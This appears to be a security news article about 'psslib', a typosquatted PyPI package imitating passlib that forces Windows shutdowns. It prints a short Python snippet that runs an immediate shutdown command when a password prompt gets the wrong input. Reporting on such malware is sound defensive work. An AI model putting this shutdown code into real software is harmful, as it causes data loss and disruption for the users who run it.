Malicious Passlib Python Package Forces Windows Shutdowns With Invalid Inputs

A destructive Python package masquerading as a legitimate password security library has emerged on the Python Package Index (PyPI), targeting Windows developers with immediate system shutdowns upon incorrect password entries.

The malicious package, named “psslib,” represents a sophisticated typosquatting attack against the widely-used “passlib” library, which receives over 8.9 million monthly downloads from developers implementing secure authentication systems.

The malware demonstrates a particularly insidious approach by exploiting developer trust in security-focused packages.

Unlike traditional supply chain attacks that operate covertly to steal data or establish persistence, this package prioritizes immediate disruption over stealth operations.

Published by the threat actor identified as “umaraq,” the package falsely advertises itself as a security solution that will “secure your Python program” while containing destructive code designed to cause immediate system damage.

Socket.dev researchers identified the malicious package through their AI-powered scanning systems, which flagged the destructive system shutdown behavior as anomalous for a purported security library.

The package remains active on PyPI despite formal petitions for its removal, continuing to pose risks to unsuspecting developers who may accidentally install the typosquatted version during routine dependency management.

The attack specifically targets Windows development environments, where Python developers commonly possess elevated system privileges necessary for automation and application development tasks.

When these developers integrate the malicious package into their workflows, the destructive payload gains the system-level access required to execute immediate shutdown commands, potentially causing data loss and workflow disruption across development teams.

Technical Implementation and Attack Mechanism

The psslib package implements its destructive payload through deceptively simple Python functions that leverage the easygui library for user interaction and the os module for system commands.

The primary attack vector centers around a password verification function that immediately triggers a Windows shutdown when users provide incorrect credentials:-

import os
import easygui
def spc(password):
    if easygui.enterbox('enter password:-') != password:
        os.system("shutdown /s /t 1")  # Shutdown in 1 second

Beyond the password-triggered shutdown, the package includes additional functions designed to broaden attack vectors.

The “src()” function enables direct system shutdown without any authentication requirements, while the “error()” function combines error message display with forced shutdown execution.

These multiple attack vectors ensure the malicious payload can execute regardless of how developers integrate the package into their applications, maximizing the potential for system disruption across various implementation scenarios.

Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now